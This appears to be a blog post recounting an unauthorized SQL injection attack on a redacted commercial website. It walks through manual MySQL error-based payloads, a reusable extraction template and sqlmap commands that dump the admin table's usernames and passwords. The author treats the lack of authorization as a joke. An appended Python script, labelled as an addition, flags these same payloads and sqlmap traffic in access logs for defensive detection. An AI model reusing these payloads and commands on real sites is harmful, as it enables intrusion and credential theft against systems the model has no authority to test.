Original link: Original | Recalling a penetration test from N years ago!
Do you still remember the dreams of your youth? Like a flower that never withers, they carried me through wind and rain, watching the world's impermanence and the changes of time!

Today, while sorting through some old hard drives, I found that N years ago I had gone after a site, apparently a fairly big one, the xx sub-site of xx Online. No more chatter; I'll reproduce the steps from back then directly. The site details are all redacted, since after all this was only a penetration test! Back then this site was pretty big, haha, and a lot of fun! It no longer loads today.

URL: 9605b51c5e694c6a596d996c226279c4
Site name: 2b030f6f63f80bf2199e6d0d67275513

Routine first step: scanning. I was quite green back then, so I just scanned for injection straight away. The tools were OWASP ZAP and Vega; both are decent and fast. I don't know whether you masters have heard of these tools, but in that era they were magic. Four injection points; I picked one at random, and that was enough.

Injection point: http://xxxx.xxxxx.com.cn/company/shop_list.php?nid=60

PS: back then there was no such concept as authorization, you get the idea~~

MySQL manual error-based injection + tool-based injection. Let's start with the manual approach and compare the two as we go.

First, the displayed (echo) columns. Not much to say about doing it by hand: on MySQL 5.0 and above, just use ORDER BY. With tools: proxy the request through Burp, then send the union probe order by 1-- with the 1 marked as the payload position fed from a number wordlist, and watch the responses. See the picture:

Next, the database information. Really, we already know it's 5.0; a site that big is unlikely to be on anything below 5.0.

By hand, checking the MySQL version:

+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
With the tool, sqlmap: sqlmap -u url. Doing it by hand is still faster. Let's continue and dump the database names manually:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
There it is. The part to change is:

FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1)
Change it to LIMIT 1,1), LIMIT 2,1), and so on to enumerate the databases one by one. For speed, I won't go through them all. Tool: sqlmap -u url --dbs. Current database: it comes out in hex, 70726F64756374, which is Product, the current database. Let's keep going; now we need the table names:

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=<hex db name> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In the table-name query, substitute the database name we dumped earlier. 61646D696E is ADMIN. With the tool: sqlmap -u url -D <db> --tables. Honestly, over a Hong Kong VPN sqlmap's speed was quite respectable! Next we dump the columns:

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Again, we change the trailing LIMIT parameter to dump more. There are too many, so straight to the tool: sqlmap -u url -D <db> -T <table> --columns. See the light at the end of the tunnel?

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Here is the general template:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,<table>.<column>,0x27,0x7e) from <table> limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
All clear? The above was the password; now let's get the username.
Username: (screenshot)
Password: (screenshot)

Then the tool, which gets it out very quickly:

sqlmap -u http://xxxx.xxx.com.cn/company/shop_list.php?nid=60 -D product -T admin -C username,password --dump
This was N years ago, but it is just as applicable today. On many big sites injection is now rare, so think more about logic flaws; your SRC bounty may well go up.
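As an added example that is not part of the original post, this Python script shows what the requests described above look like from the server side: it parses combined-format access log lines and flags the error-based MySQL injection markers quoted in this post. The log lines, timestamps and IP address are constructed, and it assumes sqlmap was left with its default User-Agent.

```python
import re
from urllib.parse import unquote_plus

# Signatures lifted from the payloads quoted in this post: the floor(rand(0)*2)
# ... group by duplicate-key trick, name_const() used to leak @@version,
# information_schema enumeration, the ORDER BY column probe, and the hex
# string literals used in place of quoted names (0x70726F64756374 = product).
SIGNATURES = {
    "error_based_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "name_const_version": re.compile(r"name_const\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\s*\.\s*(schemata|tables|columns)", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}
# sqlmap's default User-Agent begins with "sqlmap/" unless the operator changes it.
SQLMAP_UA = re.compile(r"\bsqlmap/", re.I)

# Apache/nginx "combined" format; the User-Agent is the last quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def normalise(target):
    """URL-decode twice ('+' counts as a space) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(target)))

def classify(line):
    """Return {'ip', 'status', 'hits'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    text = normalise(m.group("target"))
    hits = [name for name, pat in SIGNATURES.items() if pat.search(text)]
    if SQLMAP_UA.search(m.group("ua")):
        hits.append("sqlmap_user_agent")
    return {"ip": m.group("ip"), "status": int(m.group("status")), "hits": hits}

def scan(lines):
    """Keep only the lines that tripped at least one signature."""
    return [r for r in map(classify, lines) if r and r["hits"]]

# Constructed sample lines modelled on the requests this post describes.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2013:10:01:02 +0800] "GET /company/shop_list.php?nid=60 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2013:10:02:11 +0800] "GET /company/shop_list.php?nid=60+order+by+1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2013:10:03:40 +0800] "GET /company/shop_list.php?nid=60+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) HTTP/1.1" 500 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2013:10:05:07 +0800] "GET /company/shop_list.php?nid=60%20and(select%201%20from(select%20count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_schema=0x70726F64756374%20limit%203,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 612 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]
```

Running scan(SAMPLE_LOG) returns the three probing requests with their matched signatures; a 500 status alongside these markers is the error message leak the floor(rand(0)*2) trick depends on, so suppressing database errors in responses and parameterizing nid both close this path.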